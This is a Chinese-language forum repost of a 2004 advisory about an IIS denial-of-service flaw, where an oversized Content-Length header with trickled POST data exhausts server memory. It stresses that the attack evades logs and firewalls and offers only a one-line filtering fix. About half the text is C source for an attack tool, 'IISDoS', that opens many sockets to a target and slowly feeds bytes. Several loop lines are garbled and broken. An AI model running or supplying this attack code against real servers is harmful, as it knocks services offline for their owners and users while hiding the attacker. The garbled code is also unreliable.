中国PHP联盟 - 喜悦国际村 - HTTP协议Content Lenth限制漏洞导致拒绝服务攻击

※阅读文章※

HTTP协议Content Lenth限制漏洞导致拒绝服务攻击

作者:不祥 [文章出自: www.fanqiang.com]

漏洞描述：
在HTTP协议中，当使用POST方法时，可以设置Content Lenth来定义需要传送的数据长度，但是HTTP协议中并没有对Content Lenth的大小进行限制，这使得拒绝服务-内存耗尽攻击成为可能。
在IIS中，用户POST数据时，系统先将用户上传的数据存放在内存中，当用户完成数据传送（数据的长度达到Content Lenth时），IIS再将这块内存交给特定的

文件或CGI处理；如果用户POST非常大的数据（通过多次数据发送）例如Content Lenth:999999999，在传送完成前，内存不会释放，攻击者可以利用这个缺陷，连续向WEB服务器发送垃圾数据直至WEB服务器内存耗尽。在Web服务器内存不足的时候，我们可以明显的看到系统速度下降、硬盘读写增多（缓存）等现象的出现。

值得注意的是，这种攻击方法基本不会留下痕迹：
首先，由於数据传送不会完成（只要Content Lenth足够大,比如Content-Length: 2147483647），所以IIS日无法记录（IIS日是在操作完成後才记录的）

其次，由於进行的是正常的POST操作，而且数据是缓慢送入WEB服务器的，因此防火墙很难发现这样的操作。（除非在防火墙上
对Content Lenth进行监测）

第三，这种攻击对於攻击者的主机来说几乎没有任何负荷，既不会消耗CPU更不会占用内存，最多是占用了部分带宽。

解决方法：
编写相应的Filter，对於过大的Content Lenth进行过滤。

漏洞测试：
以下的程式可以测试你的服务器是否有Content Lenth漏洞:

// IISDoS
// By Shotgun
// shotgun@xici.net

void IISDos()
{
int net[2048],Counter=0,K=0,i,j;
struct sockaddr_in sa;
char send_data[1024]="POST /default.asp HTTP/1.1 \n Host:xici.net \n Content-Type: text/html \n Content-Length:

2147483647\n\r";
char *send_char;
WSADATA WSAData;
strncpy((char *)&sa, "", sizeof sa);
sa.sin_family = AF_INET;
sa.sin_port = htons(80);
sa.sin_addr.s_addr=inet_addr(Attack_IP);
send_char=(char *)malloc(sizeof(char));
for(i=0;i{
if((net[i]=socket(AF_INET, SOCK_STREAM, 0))==INVALID_SOCKET)
{
printf("Allocating scoket %d falid.\ErrorCode:n",i);
exit(0);
}
if((connect(net[i], (struct sockaddr *) &sa, sizeof sa))!=0)
{
printf("Connect %d failed.ErrorCode:%d\n",i,GetLastError());
for(i=0;iWSACleanup();
exit(0);
}
if(send(net[i],send_data,sizeof(send_data),0)==SOCKET_ERROR)
{
printf("Sending %d data to the server failed1.ErrorCode:%d\n",i,GetLastError());
exit(0);
}
for(j=0;jif(send(net[i],"A",1,0)==SOCKET_ERROR)
{
printf("Sending %d Keepalive data failed.ErrorCode:%d\n",i,GetLastError());
exit(0);
}
Sleep(200);
}
while(1)
{
for(i=0;iif(send(net[i],"A",1,0)==SOCKET_ERROR)
{
printf("Sending %d data failed.ErrorCode:%d\n",i,GetLastError());
closesocket(net[i]);
WSACleanup();
exit(0);
}
else
{
Counter++;
if(Counter==1024)
{
Counter=0;
K++;
printf("%dKb ",K);
}
Sleep(DelayTime);
}
}
for(i=0;iclosesocket(net[i]);
WSACleanup();

文章加入时间: 2004-11-17 15:01:50 责任编辑: w9 (2510 人次查阅)